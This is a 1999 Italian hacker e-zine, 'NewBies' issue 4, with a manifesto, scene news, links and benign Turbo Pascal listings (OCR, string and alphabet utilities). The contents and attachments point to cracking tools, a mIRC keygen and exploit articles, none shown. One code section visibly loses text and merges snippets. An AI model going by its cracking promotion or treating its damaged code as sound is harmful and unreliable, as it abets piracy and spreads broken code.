@-,',.,',.,',.,',.,',-@ | _ _ ____ _ | | | \ | | _____ _| __ )(_) ___ ___ | -+- | \| |/ _ \ \ /\ / / _ \| |/ _ Y __|-+- : | |\ | __/\ V V /| |_) | | __|__ \ : | |_| \_|\___| \_/\_/ |____/|_|\___|___/ | @-,',.,',.,',.,',.,',-@ NEW BIES (num 4) (data 26/08/99) [ powered By ZeroCool and N0bodY88 ] DISCLAIMER LEGALE ------------------------------------------------------------------------------ IL NEWBIES STAFF NON SI ASSUME NESSUNA RESPONSABILITA' X L'UTILIZZO DELLE TECNICHE SOTTO RIPORTATE, LE QUALI SONO STATE DISTRIBUITE UNICAMENTE X CONDIVIDERE LE CONOSCENZE DA NOI "ACUISITE" (mitico edu...) E PER CERCARE QUALCUNO CON CUI CONFONTARE LE NS ESPERIENZE E LE CONOSCENZE X MIGLIORARE VICENDEVOLMENTE.....DIVERTENDOSI! N0bodY88 of NewBies Staff ------------------------------------------------------------------------------ PREMESSA Questa e-zine e' nata in una giornata qualsiasi di gennaio, mentre 2 newbies stavano parlando tra loro in IRC di non mi ricordo cosa. Da quel fatidico giorno la e-zine e' cresciuta, le persone che ho contattato x scrivere un articolo mi hanno dato la loro disponibilita' e entro alcuni giorni mi hanno fatto avere il loro operato. Alcune persone hanno fatto tardi x notti intere (fra cui il sottoscritto) ed hanno sacrificato il loro tempo x creare qualcosa che fosse nuovo, divertente, che ci facesse diventare + bravi, + amici, + uniti e forse...beh...forse anche + famosi...hihihi! Questo e' quello che abbiamo realizzato insieme, collaborando e scambiandoci opinioni. Se questa e-zine non vi piace, e' troppo semplice o e' stupida non scriveteci (oppure scriveteci x migliorare un art. della e-zine sfruttando le vostre conoscenze) ma se solo sara' piaciuta ad una persona, se solo un ragazzo dopo aver letto questa avra' deciso di passare a linux, di programmare in visual basic, di farsi una propria backdoor o di mettersi a studiare come si usa telnet (troppo poco attrezzato di voci nei menu x essere quello tanto decantato dovunque, ma anche troppo simpatico con il suo prompt a mo di Commodore 64) allora questa e-zine sara' servita a qualcosa. E ricordate...newbies si nasce, hacker si diventa. Buona lettura ^__^ N0bodY88 INTRODUZIONE: Creatura nata per vivere e cibarsi del Sacro cibo della Conoscenza , attendiamo alla ricerca di nuovi orizzonti nuove culture con cui confrontarci. Crediamo da tempo in cio' che altri non credono Vediamo cio' che gli altri non immaginano , Sentiamo il suono della conoscenza che impregna la vista e la mente , Noi siamo il futuro , un futuro in cui il mondo cieco e stolto non vuole credere . Siamo hacker e ricorda tu stolto che il nostro grido e' unisono : CoNosCenZa . Il mondo forse non e' preparato ad accetare usi e idee che quotidianamente noi promulghiamo. Tu giudicatore Tu fautore di morte ... Ricorda noi siamo e sempre saremo piu' forti di te' perche' il sapere ci affascina come un frutto proibito e quotidianamente ce ne cibiamo. Questo e' il mio credo , la mia vita e il mio essere stesso.. ZeroCool ͻ ARTICOLO ͹ AUTORE ͹ |PREMESSA N0bodY88 | |INTRODUZIONE ZeroCool | |NOVITA' NewBies Staff | BFI, SPIPPOLATORI, T0RMENTO, VANA IMAGO E TANTO ALTRO N0bodY88 ACTUAL SITUATION: [DIFFERENCE] ZeroCool RIEPILOGO LINK IN ORDINE ALFABETICO N0bodY88 |INFO SUGLI ALLEGATI NewBies Staff | 2 PAROLE SUGLI ALLEGATI N0bodY88 |PROGRAMMAZIONE NewBies Staff | GENESIS (GEneral NEural SImulation System) ZeroCool PROGETTO ANGELA : OVVERO COME BUTTARE IL TEMPO ;) N0bodY88 |CRACKING NewBies Staff | HOW TO VTT 1.75 DeViLNeT GENERATORE DI CHIAVI X MIRC32 5.6 Cod MA XCHE' SBORSARE 29 DOLLARI PER REGISTRARE WINZIPPO ???? DeViLNeT APPROFONDIMENTO SULLE CHIAVI HASP BlackDruiD |TEORIA NewBies Staff | SOX...WINGAYZ E PROXY...CHE CONFUSIONE... Dante Alighieri ER COSIDDETTO MONITORAGGIO N0bodY88 |TRADUZIONI NewBies Staff | COME CAMBIARE IL NOME DI REGISTRAZIONE DI WINDOWS 95 E 98 N0bodY88 FINGERD EXPLOIT N0bodY88 |LE INTERVISTE E LE NOTTATE IMPOSSIBILI NewBies Staff | INTERVISTA AD UN PERFETTO ANONIMO N0bodY88 |PHREAKING NewBies Staff | TELECUM BRUTE FORCIN' Dante Alighieri |LINUX - UNIX - VARI NewBies Staff | COME PARTIZIONARE L'HD X LINUX Z10-K41i GESTIONE DEI PERMESSI SU FILE E DIRECTORY DI LINUX/UNIX EsPoNeNtIaL FoRcE SCHERZI SIMPATICI DA FARE AL SYSADMIN Pankrazio TABELLUZZA DI VI Dante+N0bodY88 MINI GUIDA ALL'INSTALLAZIONE DI BITCHX SOTTO UNIX OS \JusTme\ COME CI SI MUOVE IN LINUX St0rM BriNgeR COME SI CREA UN NUOVO UTENTE IN LINUX St0rM BriNgeR COSA FARE DOPO AVER OTTENUTO ACCESSO AD UNA SHELL St0rM BriNgeR FILOSOFIA DI UNIX X-ReWoP COME MONTARE IL CDROM IN LINUX St0rM BriNgeR |IL MONDO DI IRC NewBies Staff | GUIDA X I BOT FOR REALLY NEWBIES BUT GOOD TO READ Pankrazio SkRiPT mIRC? NO POBBEM! 1^tempo Ennaro IRCWAR - FONDAMENTI St0rM BriNgeR |HACKING DI TUTTO DI PIU' E DIVERSI ART. MOLTO INTERESSANTI NewBies Staff | IL MIO IP? BOH! Mr Skull LE LEGGI IN ITALIA SULL'HACKING S_A_S_H_A GUIDA ALL' ASSEMBLAGGIO DI UN COMPUTER DALLA A ALLA Z Devil_666 MANIFESTO DI CARNIFEX Carnifex RENDIAMOCI ANONIMI ZeroCool IL MIO EXPLOIT PREFERITO... SM 8.8.4 !!! Dante Alighieri TELEPIU' TERRESTRE: INFO VARIE JohnnyRunner BENZINA A GO G0! HarLoK BREVE E SEMPLICE LISTA DI ATTACCHI BASATI SU DATI KarmA_YogA MP3 IN AUTO: FANTASIE OLTRE LA REALTA' JohnnyRunner L'UOVO DE COLOMBO Dante Alighieri QUALKE TRUCCO DA PIPPO CALO' Pippo Calo' |SALUTI N0bodY88 | ۰۰۰۰۰۰۰۰ ۰۰۲۰۰۰۰۰۰۰۰ ۰۰۰۲۰۰۰۰۰۰۰۲۰ ۰۰۲۰۰۰۰۰۰ ۰۰۰۰۰۰۰۰ ͻ Ŀ BFI, SPIPPOLATORI, T0RMENTO, VANA IMAGO E TANTO ALTRO ٺ ͼ BFI = ovviamente parlando di BFI non si puo' non nominare il fantastico gruppo che ci sta dietro ovvero quelli di softproject, che sono uno tra i gruppi piu' tosti e produttivi della scena italiana, e non solo x la loro e-zine x la quale i complimenti sono sempre troppo pochi rispetto a quelli che meriterebbe, ma anke x il loro fantastico sito che potete vedere andando al www.softpj.com x il quale /sPIRIT/ se non ha sudato sangue poco ci manca... Non perdetevi inoltre i vari exploit scoperti (e qui si denota anke il livello del gruppo) dai membri del softpj stessi. Come al solito che la maledizione vi colga se vi perdete anke+ un solo bit di sito e e-zine... inoltre leggetevi il mitico numero 6 (che io ho gia' stampato) e il number estivo speciale x il quale vi dovrete far ricoverare x tremenda ridarola acuta... SPIPPOLATORI = gli spippolatori continuano a sfornare ottimi numeri della loro magnifica e-zine NetRunners piena di articoli interessanti che sta avendo un successo sia x le qualita' e la voglia di fare degli scrittori sia x l'ampia conoscenza che sta alle spalle di quei nomi che vedete in fondo agli articoli. Il sito ormai considerato un must sia x il newbies sia x l'hacker piu' affermato ha cominciato il grande e mitico progetto di cercare di raccogliere in un unico sito tutte le e-zine nostrane attinenti all'hacking e a tutte le varie forme di liberta' e protesta. Segnalo inoltre la marea di testi disponibile sul sito di produzione degli Spp ma anke mirrorata dai piu' famosi siti di hacking, unix e dintorni come quello dei dislessici, quello di quequero e molti altri di cui sarete felici di fare la conoscenza... RINGZERO = questo sito creato dal gruppo stesso di Ring0 continua a pubblicare sempre nuovi tut e sempre piu' interssanti che vanno bene sia x chi di crackers conosce solo quelli da mangiare sia x chi la sera dialoga in chat con xOANON, +ORC o FRAVIA quindi fate un po' voi ma se anke solo minimamente vi interessate di programmazione e/o craking io un sito cosi' non credo che me lo perderei x nulla al mondo...quindi crackers di tutti italia...tutti subito al mitico sito http://ringzer0.cjb.net e vai giu' di teleport ;) T0RMENT0 = ebbene si' con mia enorme gioia T0rment0 ha deciso di fare una propria e-zine che sinceramente mi sembra molto piu' che valida e che abbraccia la filosofia dei newbies. Ottima sia come raccolta di exploit che come guida x non scoraggiarsi davanti ai listati di c o ai comandi e la filosofia di unix...che dire...scaricatevela e giudicatela voi ovviamente al sito del ns mitico scrittore (e ora anke redattore) T0rment0. E ricordatevi di dare una okkiata anke al resto del sito oltre a scaricare la e-zine...dove direte voi? Ovviamente a http://web.interpuntonet.it/xj/ !!! VANA IMAGO = che dire imo una e-zine molto bella fatta da un grande amico che mi dispiace vedere cosi' poco, x il resto che dire...basta che ve la scarichiate e andrete da dio! Per chi non visita + il sito da un po' sappiate che e' uscito il mitico numero 3 quindi correte in edicola..ehm...scusate...sapete...l'emozione... QUEQUERO = l'ormai sempre piu' ricercato Quequero sta sulle bocche di tutti con la sua fantastica UIC (Universita' Italiana di Cracking) dove trovare tutorial, attrezzi del mestiere, consigli e molto molto altro (se non quasi tutto) che potete subito andare a visitare scrivendo nella barra del vostro browser (ie o netscape non importa tanto imo (x i precisini lo so ci sono anke opera, lynx etc ;P)) il seguente url http://quequero.cyb.net dopodiche' crackare non sara' piu' un sogno cosi' lontanto anke se nonostante tutto la strada e' lunga e in salita ma poi arriva la discesa :) ͻ Ŀ ACTUAL SITUATION: [DIFFERENCE] ٺ ͼ La situazione attuale in italia prevede l'implementazione di " un nuovo " sistema di trasmissione dati l'adsl implementato per ora a milano a quanto so' da 200 beta tester . La formula inq uestione che verra' adottata sara' di due tipi: connessione a 2mb/s con ipfisso connessione a 4mb/s con ipfisso I prezzi non saranno la bolletta telefonica e il costo dell'abbonamento pur adsl addottando la normale linea telefonica per il collegamento . [invia una stringa alfanumerica al provider]. Ci sara'solamente un fisso da pagare e 0 bolletta al momento non conosco i prezzi. The situation in usa is different between italy we have now implement a various type of technology : adsl [aol 4mb/s ] and cable 7 [1.2mb/s] The price that society as aol and cable inwiry offer are very good in this period we 've a price of 20USD for month for cable seven and about 80USD for aol service.. I know that some place in usa are not connected to this service as ohio [for adsl] . Cable modem prize and connectivity from some Inc. are up higher. ZeroCool ͻ Ŀ RIEPILOGO LINK IN ORDINE ALFABETICO ٺ ͼ [ D.I.B. ----------------------------------------------> http://come.to/dib ] [ NetRunners ---------------------> http://members.tripod.com/~teresacanis/ ] [ NewBies -----------------------------------------> http://newbies.tsx.org ] [ Quequero ---------------------------------------> http://quequero.cjb.net ] [ RFC (sito dove le potete trovare) ------------> http://www.faqs.org/rfcs/ ] [ RingZ3rO ---------------------------------------> http://ringzer0.cjb.net ] [ Softpj -------------------------------------------> http://www.softpj.com ] [ SoftWord ------------------------------------------> softword.webjump.com ] [ Spaghetti Phreakers -----------------> http://come.to/spaghettiphreakers/ ] [ Spippolatori -------------------------------> http://www.spippolatori.com ] [ T0rment0 -------------------------------> http://web.interpuntonet.it/xj/ ] [ Vana - Imago ------------------> http:/members.xoom.com/eripper/index.htm ] NOTA DI N0bodY88 = Se volete che il nome della vs crew con l'url del vs sito sia presente nella soprascritta tabella basta che ce lo comunichiate e sara' fatto sia x siti newbies che x siti di hacking. ۰۰۰۰۰۰ ۰۰۰۰۰۰۰ ۲۰۰۰۰۰۰۲۰۰۰ ۰۰۰۰۰۰۰۰۰ ۰۰۰۰۰۰۰۰۰۰ 2 PAROLE SUGLI ALLEGATI: - angela.pas = sorgente del programma angela fatto da un pazzo della crew... - angela.exe = l'eseguibile x chi non ha tempo di installarsi pascal o x chi vuole dare solo un occhiata a che cazzata di prog e'... - mirckey.exe = prog che genera le chiavi x mirc fatto dal mitico cod. ۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰ ۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰ ۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰ ۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰ ۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰ ͻ Ŀ GENESIS (GEneral NEural SImulation System) ٺ ͼ GENESIS (GEneral NEural SImulation System) Morgan Kaufmann, San Mateo, CA. 485-492, 1989 Genesis come potete leggere e' un progetto di tutto conto . Sinceramente i progetti sperimentali mi hanno sempre interessato e quindi una volta riinstallato per la 100 volta il mio caro unix ho compilato subito questo pakketo indubbiamente unico nel suo genere . Ma volutamente distribuito con i source e docz per una eventuale modifica. Bhe dopo due giorni di attenta lettura e documentazione folle tra le migliori universita' online mi sono venute un paio di idee che ho subito applicato , bhe vediamole insieme Genesis in se ' stesso ha una struttura molto ramificata ma semplice e ideale per una sua ricompilazione con eventuali modiche che ho apportato. bhe pensiamo di modificarlo per non limitarlo alle 4 funzioni [guia'bellisime che gli sono s tate assegnate] allora: /************************************************************************ * * * File: test.pas * * * * training and analysis of * * multilayer perceptron (MLP) neural networks for mapping. Such * * networks have sigmoidal hidden units and linear activations in * * the output units. * * * * General routines. * * * ************************************************************************ program OCR; (* (c) Program -- (1) reads PCX file into a viewport ; (2) converts viewport to a 2 dimensional picture (Xs and .s); (3) execs to BrainMaker (a neural network); (4) BrainMaker evaluates the pictures; (4) converts BrainMaker output evaluations to text; requires BrainMaker neural net (from California Scientific Software) and PCX Tools (from Genesis Programming). *) uses Crt, Dos, Graph, pcx_tp; var F, F2 : text; const { BGI fonts } Fonts : array[0..4] of string[13] = ('DefaultFont', 'TriplexFont', 'SmallFont', 'SansSerifFont', 'GothicFont'); { BGI text directions } TextDirect : array[0..1] of string[8] = ('HorizDir', 'VertDir'); Num_of_patterns = 10; Num_of_characters = 2000; { for 80 x 25 Viewport } Input_file_from_neural_net = 'C:\TP\EXE\BrainRTS.Out'; Output_file_for_neural_net = 'C:\TP\EXE\BrainRTS.In'; OCR_Output_file = 'C:\TP\EXE\OCR.Out'; PCX_file = 'C:\TP\EXE\a.PCX'; Line_length = 79; Threshold = 0.60; PCX_type = pcxCGA_6; type Weights = array[1..Num_of_characters] of string[4]; Patterns = array[1..Num_of_characters] of string[1]; { objects } NNIptr = ^neural_net_interpreter; neural_net_interpreter = object Array_index : integer; First_char, S : string; Weight : Weights; Output_pattern : Patterns; constructor Init; destructor Done; virtual; procedure Get_weights; procedure Output_characters; end; Screenptr = ^screen; screen = object GraphDriver : integer; { Graphics device driver } GraphMode : integer; { Graphics mode value } MaxX, MaxY : word; { Maximum screen resolution } ErrorCode : integer; { Reports any graphics errors } MaxColor : word; { Maximum color value available } pcxReturn : integer; PixelStatus : integer; ViewInfo : ViewPortType; constructor init; destructor done; virtual; procedure Initialize; end; var OldExitProc : Pointer; { Saves exit procedure address } {$F+} procedure MyExitProc; begin ExitProc := OldExitProc; { Restore exit procedure address } CloseGraph; { Shut down the graphics system } end; { MyExitProc } {$F-} procedure screen.Initialize; { Initialize graphics and report errors} var InGraphicsMode: boolean; { Flags graphics initialization} PathToDriver : string; { Stores DOS path to *.BGI & *.CHR } begin { When using Crt & graphics, turn } { off Crt's memory-mapped writes } DirectVideo := False; OldExitProc := ExitProc; { Save previous exit proc } ExitProc := @MyExitProc; { Insert our exit proc in chain } PathToDriver := ''; repeat GraphDriver := Detect; { Autodetect graphics adapter } InitGraph(GraphDriver, GraphMode, PathToDriver); ErrorCode := GraphResult; { Preserve error return } if ErrorCode <> grOK then { Error? } begin Writeln('Graphics error: ', GraphErrorMsg(ErrorCode)); if ErrorCode = grFileNotFound then begin Writeln('Enter full path to BGI driver'); Writeln('or type to quit.'); Readln(PathToDriver); Writeln; end else Halt(1); { Some other error: terminate } end; until ErrorCode = grOK; end; { Initialize } { object constructors & destructors } constructor screen.init; begin end; destructor screen.done; begin end; constructor neural_net_interpreter.init; begin end; destructor neural_net_interpreter.done; begin end; { object methods } procedure neural_net_interpreter.Get_weights; var This_weight : string[4]; This_pattern : string[1]; Count : integer; W : word; Char_Ptr : integer; begin FOR Count := 1 TO Num_of_characters DO { Initialize arrays } begin Weight[Count] := ' '; Output_pattern[Count] := ' '; end; Assign(F,Input_file_from_neural_net); Reset(F); Array_index := 1; WHILE Array_index <= Num_of_characters DO begin Readln(F,S); First_char := Copy(S,1,1); IF First_char = ' ' THEN begin Char_Ptr := 2; FOR Count := 1 TO Num_of_patterns DO begin This_weight := Copy(S,Char_Ptr,4); Weight[Array_index] := This_weight; Char_Ptr := Char_Ptr + 5; This_pattern := Copy(S,Char_Ptr,1); Output_pattern[Array_index] := This_pattern; Char_Ptr := Char_Ptr + 2; Inc(Array_index); end; end; end; Close(F); end; procedure neural_net_interpreter.output_characters; var Output_char : string; Pattern_count, Char_count, ReturnCode : integer; Wt, New_weight : real; begin Assign(F2,OCR_Output_file); Rewrite(F2); Array_index := 1; Char_count := 1; WHILE Array_index <= Num_of_characters DO begin Pattern_count := 1; Wt := 0; Output_char := ' '; WHILE Pattern_count <= Num_of_patterns DO begin Val(Weight[Array_index],New_weight,ReturnCode); IF New_weight > Wt THEN begin Wt := New_weight; Output_char := Output_pattern[Array_index]; end; Inc(Pattern_count); Inc(Array_index); end; IF Wt >= Threshold THEN Write(F2,Output_char) ELSE Write(F2,' '); IF Char_count > Line_length THEN begin Writeln(F2); Char_count := 0; end; Inc(Char_count); end; Close(F2); end; var NNI : NNIptr; procedure pcx_to_neural_net; { get a.PCX; display it; & convert it to txt for neural net. } var SPort : Screenptr; X, Y : integer; XPt, YPt, RowPt : integer; S : string; begin New(SPort,init); WITH SPort^ DO begin Initialize; Maxx := GetMaxx; Maxy := GetMaxy; SetViewPort(0,0,Maxx,Maxy,ClipOn); SetTextStyle(DefaultFont, HorizDir, 1); pcxReturn := pcxSetDisplay(PCX_type); pcxReturn := pcxFileDisplay(PCX_file,0,0,0); IF (pcxReturn = pcxSuccess) THEN begin Assign(F,Output_file_for_neural_net); Rewrite(F); GetViewSettings(ViewInfo); { coordinates of Viewport } XPt := 0; YPt := 0; RowPt := 0; WHILE RowPt <= ViewInfo.y2 DO begin WHILE XPt <= ViewInfo.x2 DO begin FOR Y := YPt to (YPt + 7) DO begin FOR X := XPt to (XPt + 7) DO begin PixelStatus := GetPixel(X,Y); IF PixelStatus = 0 THEN write(F,'.') ELSE write(F,'X'); end; writeln(F); end; YPt := RowPt; XPt := XPt + 8; end; XPt := 0; RowPt := RowPt + 8; YPt := RowPt; end; end; Close(F); end; Dispose(SPort,done); end; { pcx_to_neural_net} begin { program body } pcx_to_neural_net; New(NNI, init); WITH NNI^ DO begin SwapVectors; exec('C:\COMMAND.COM','/C C:\BATCH\net'); SwapVectors; IF DosError <> 0 THEN Writeln('Dos error # ',DosError) ELSE Get_weights; Output_characters; Dispose(NNI, done); end; end.  ***************************************************************************** ** ED ORA I GIUSTI COPYRIGHT: {now the right copyright} ** GENESIS; Neural Systems Simulator ** ** Written by: Matt A. Wilson (wilson@smaug.cns.caltech.edu) ** Upinder S. Bhalla (bhalla@aurel.cns.caltech.edu) ** John D. Uhley (uhley@albion.dei.caltech.edu) ** David H. Bilitch (dhb@bek-mc.cns.caltech.edu) ** Mark E. Nelson (nelson@smaug.cns.caltech.edu) ** James M. Bower (jbower@smaug.cns.caltech.edu) ** ** HELIOS compatibility modifications by :- ** ** Michael D. Speight (mds3@smaug.cns.caltech.edu) ** ** X11R4 upgrade modifications by:- ** ** Randall D. Smith (randy@ai.mit.edu) ** ** Copyright 1988, 1989 and 1990 by the California Institute of Technology ** ** Permission to use, copy, modify, and distribute this ** software and its documentation for any purpose and without ** fee is hereby granted, provided that the above copyright ** notice appear in all copies and that both that copyright ** notice and this permission notice appear in supporting ** documentation, and that the name of the California Institute ** of Technology not be used in advertising or publicity pertaining ** to distribution of the software without specific, written prior ** permission. The California Institute of Technology makes no ** representations about the suitability of this software for any purpose. ** It is provided "as is" without express or implied warranty. ** ***************************************************************************** Continuiamo nel nostro lungo cammino e procediamo all'analisi di un altro interessante idea che mi e' venuta in mente e che sto sperimentando con alcuni amici [mit uni forever] allora come bhe sappiamo dicendola semplice un sistema sicuro di trasmissione non esiste e credo mai esistera' e il des ormai e' diventato vecchio e obsoleto non piu' in grado di reggere i tool e gli apperecchi hardware che in pochi giorni rendono facile la decodifica di questo algoritmo . Bhe cavolo come si puo' allora stare sicuri in questa rete .. Bhe un hacker direbbe meglio cosi' e' comodo ... ma sto tentando essere dalla parte dei sysadmin piu'bravi e dei ricercatori . Prima di tutto un sitema sicuro di trasmissione com gia' visto si basa sulla trasmissione su due canali da due apparecchi diversi come avviene per gli usa e la russia che utilizzano aerei a distanza specificate per trasferire importanti informazioni attraverso aerei che con l'apparecchiatura fornitale utilizzano due canali : uno per la trasmissione del codice ed uno per le informazzioni una volta verificato il codice stesso . Bhe pensiamo di volere fare la stessa cosa sulla rete ... ci ho riflettuto e non e'facile ma non impossibile... e sarebbe fattibile allora sviluppiamo il modo e il codice per procedere. Di che abbiamo bisogno , prima di tutto di due server dedicati al compito su alta connettivita' [t3 o t1] entrambi devono avere solo 3 porte aperte : la prima ad esempio telnet nel quale l'utente inserisce le informazioni e ovvimanete il codice di algoritmo [des al momento ] e i ovviamente il suo login / passwd [magari anke altre informazioni personali durante il logon che solo il server conosce ... possibilissimo da implementare] Bhe dopo questa operazione iniziale il server procede al salvataggio dei dati su memoria di massa [hd] e procede alla sec fase. la seconda porta serve al trasferimento del codice del server all'altro server che la verifica e poi all'invio del codice utente che l'utente destinatario del messaggio dovra'ricevere .Ora il passaggio codice e' completo Il server procedera'ora' a aprire su un porta random che sara' comunicata al software dell'utente che invia il messaggio e a quello che lo riceve. Il messaggio inviato verra'cmq criptato in des e inviato al destinatario Il server chiudera'ovvimante la porta aperta e cancellera'il codice dala memoria di massa. PROBLEMI A CUI E' DIFFICILE PROVVEDERE: n.1 il codice utilizzato e' des n.2 il tempo [lo scambio deve avvenire in tempo reale tra i due server ma anche tra i due utenti ... il server potra' accettare solo un utente e non piu' di uno per motivi legati ovviamente alla sicurezza] n.3 la connessione tra i due server deve essere diretta e non passare per altri pc altrimenti il fattore sicurezza e' zero. IDEE CONSEGUITE: per la n.3 internet e' difficle per la sua implementazione ma possibile attraverso strutture adeguate [vedi P30000 hehehehe magari] .... per la n.1 make another codez zcools .... HahAha not a good idea i think that is more good than a codez that i can do HahAha..... per la n.2 bhe questo secondo me e' giusto e credo che se anke puo' causare disguidi aiuti in maniera forte la sicurezza... non avete tempo aspettare che la vs spia di fiducia si colleghi allora cavoli vostri hehehe. ZeroCool ͻ Ŀ PROGETTO ANGELA : OVVERO COME BUTTARE IL TEMPO ;) ٺ ͼ Ed ecco a voi il miglior coder, il pluripremiato e invidiato programmatore, il pluriricercato da Bill GAYtes, il mitico crackatore... ...hihihi... ...ci avevate creduto... ...e invece no...sono sempre io...io chi? ...continuate a leggere e lo saprete presto... Salve a tutti questo e' il vostro N0bodY88 che vi scrive questa diciamo minidescrizione di alcune parti del codice che potete trovare tra gli allegati sotto il nome di angela.pas (sera :). Questo programma da me fatto non centra un benemrito caxxo con l'hacking ma almeno centra un po' con la crittografia e soprattutto la programmazione. Siccome il programma e' lungo (a sproposito imo) ho pensato di spiegare solo le parti non intuibili (alla prima okkiata) e anke se so che molti rideranno di questa mia "creazione" io so che hacking e' uno stato mentale e implica creativita' e tanta immaginazione quindi....immaginate che sia un bel programma fatto da un creativo (pensate che rido di me perfino io stesso hihihi). Allora il primo spezzone che prenderemo in esame sara' quello utile (?) al capovolgimento di una frase e/o una parola. Per capovolgere una frase uso un semplice algoritmo che consiste nel leggere la lunghezza della frase con la funzione Length, dopodiche' si fa un ciclo che va da 1 alla lunghezza totale della frase e assegniamo a una nuova variabile azzerata prima del ciclo (x evitare problemi se si riusa questa parte del programma) una alla volta tutte le lettere, gli spazi e i numeri assegnando prima l'ultima lettera, poi la penultima, poi la terzultima e cosi' via. Per ottenere questo basta che alla lunghezza totale togliamo la I che da 1 andra' in crescendo. Alla fine non ci rimarra altro da fare che stampare la nostra nuova variabile contenente tutti i valori della frase di 'capov', solo che...capovolti :) --- INIZIO CODICE --- capov:=''; olta:=''; GotoXY(10,10); writeln ('Scrivi la frase da capovolgere. '); GotoXY(10,12); readln (capov); J:=length(capov); olta:=''; FOR I:=1 TO J DO BEGIN olta:=olta+capov[j-I]; END; GotoXY(10,15); writeln ('La frase capovolta e'': ',capov[J]+olta); GotoXY(10,17); readln; --- FINE CODICE --- La seconda funzione di angela e' semplicissima e serve x crearsi un nuovo alfabeto derivante da quello tradizionale. In pratica cio' che ho fatto e' stato richiedere un numero compreso tra 1 e 26 e riempire un array con le stesse caratteristiche di quello contenente le 26 lettere dell'alfabeto con un criterio dato dal numero ottenuto in input. Se ad esempio io inserisco il numero 4 il sotto-programma mi sposta nel secondo array prima le lettere dal numero scelto, quindi dal 4, fino al 26 poi successivamente vi aggiungeva le lettere che andavano dalla A fino al numero scelto meno uno (4-1). In questa maniera noi possiamo cioe' crearci un alfabeto nuovo nuovo da poter usare in un ns futuro programma di criptazione. --- INIZIO CODICE --- begin clrscr; GotoXY(10,10); writeln ('Dammi un numero da 1 a 26 '); GotoXY(10,12); readln (X); for I:=1 to (26-X+2) do begin data2[I-1]:=data1[I+X-2]; end; for I:=1 to (X-1) do begin data2[I+26-X]:=data1[I-1]; end; GotoXY(10,16); writeln ('Vediamo come sarebbe l''alfabeto se '); GotoXY(10,17); writeln ('iniziasse x la lettera che hai scelto: '); GotoXY(10,20); for I:=1 to 26 do begin write (data2[I-1]); end; readln; end; --- FINE CODICE --- Qui non c'e' nulla da spiegare ho solo utilizzato il comando FindFirst passandogli come argomenti una lista di file (prima .EXE e poi .PAS). Per maggiori informazioni cercate FindFirst nella guida di TP. --- INIZIO CODICE --- begin clrscr; GotoXY(1,5); writeln ('ELENCO FILE .EXE: '); FindFirst('*.EXE', Archive, DirInfo); GotoXY(1,7); while DosError = 0 do begin Writeln(DirInfo.Name); FindNext(DirInfo); end; readln; clrscr; GotoXY(1,5); writeln ('ELENCO FILE .PAS: '); FindFirst('*.PAS', Archive, DirInfo); GotoXY(1,7); while DosError = 0 do begin Writeln(DirInfo.Name); FindNext(DirInfo); end; readln; end; --- FINE CODICE --- Questo spezzone utilizza la funzione Randomize e serve (se non l'avete ancora capito =) a scegliere una lettera a caso. Il programma randomizza la variabile I da 1 a 26 e mostra la lettera estratta continuamente cambiandola con un altra sempre random fino a che (per fermarsi su una delle lettere "casuali") utilizziamo la forma "until KeyPressed" cioe mostriamo le lettere finche' non viene premuto un qualsiasi tasto. Stupida cosa che potbbe tornare utile ai novelli e/o futuri programmatori. --- INIZIO CODICE --- begin clrscr; GotoXY(10,8); write ('Per fermare e vedere la lettera random schiacciare la barra'); Randomize; repeat begin GotoXY(10,10); I:=random(26); write ('La lettera estratta a caso risulta essere la ',data1[I]); end; until KeyPressed; readln; end; --- FINE CODICE --- Semplice e inutile programmino che memorizza una frase x poi cancellarne una parte da noi delimitata. Esempi noi scriviamo una frase tipo caio maz! 123456789 poi diciamo che vogliamo cancellare dalla parola le lettere dalla 3 alla 7. Il risultato sara' quindi caz! 1234 Come dicevo all'inizio inutile...forse...di sicuro...mah...chissa'... --- INIZIO CODICE --- begin clrscr; GotoXY(10,6); writeln ('Scrivi una frase di almeno tre parole: '); GotoXY(10,8); readln (canc); repeat GotoXY(10,10); writeln ('Dammi un numero minore della lunghezza della frase: '); GotoXY(10,12); readln (I); until I0) then begin GotoXY(10,12); writeln('Numero di errore di dos: ',DosError); end else begin GotoXY(10,14); writeln('Esecuzione andata a buon fine...forse.'); end; readln; end; --- FINE CODICE --- Siccome nella funzione sopra qualcosa puo' non funzionare e puo' esserci dato in output un errore di dos soot forma di numero o pensato di mettere nella opzione successiva una lista dei + comuni errori del dos con una breve e credo intuibile spiegazione. --- INIZIO CODICE --- begin clrscr; GotoXY(10,3); writeln (' LISTA ERRORI DOS E LORO SPIEGAZIONI '); GotoXY(10,6); writeln (' 2 --> File not found '); GotoXY(10,7); writeln (' 3 --> Path not found '); GotoXY(10,8); writeln (' 5 --> Access denied '); GotoXY(10,9); writeln (' 6 --> Invalid handle '); GotoXY(10,10); writeln (' 8 --> Not enough memory '); GotoXY(10,11); writeln ('10 --> Invalid environment '); GotoXY(10,12); writeln ('11 --> Invalid format '); GotoXY(10,13); writeln ('18 --> No more files '); GotoXY(10,15); writeln ('Ho voluto mettere questa lista perche'' il '); GotoXY(10,16); writeln ('programma scelto con l''8 puo'' riportare degli '); GotoXY(10,17); writeln ('errori dovuti a poca memoria o altro e cosi'' '); GotoXY(10,18); writeln ('da questa lista potete capire perche'' non funzia.'); GotoXY(10,20); readln; end; --- FINE CODICE --- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! QUESTA FUNZIONE VIENE ESEGUITA SENZA PROBLEMI SOLO SE IL FILE ANGELA E' CONTENUTO NELLA DIRECTORY C:\WINDOWS\COMMAND [se in modalita' windows] O NELLA DIRECTORY C:\DOS [se in modalita' dos] ... O ALMENO CREDO =) !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! Ovviamente ogni buon consiglio atto a migliorare il prog e la mia conoscenza stessa e' mooooooooooolto ben accetto, come le critiche d'altronde. --- INIZIO CODICE --- begin clrscr; GotoXY(10,10); writeln ('Dammi il comando dos che vuoi eseguire: '); GotoXY(10,12); readln (comando); if (comando<>'') then begin comando:='/C ' + comando; swapvectors; exec(getenv('COMSPEC'), comando); 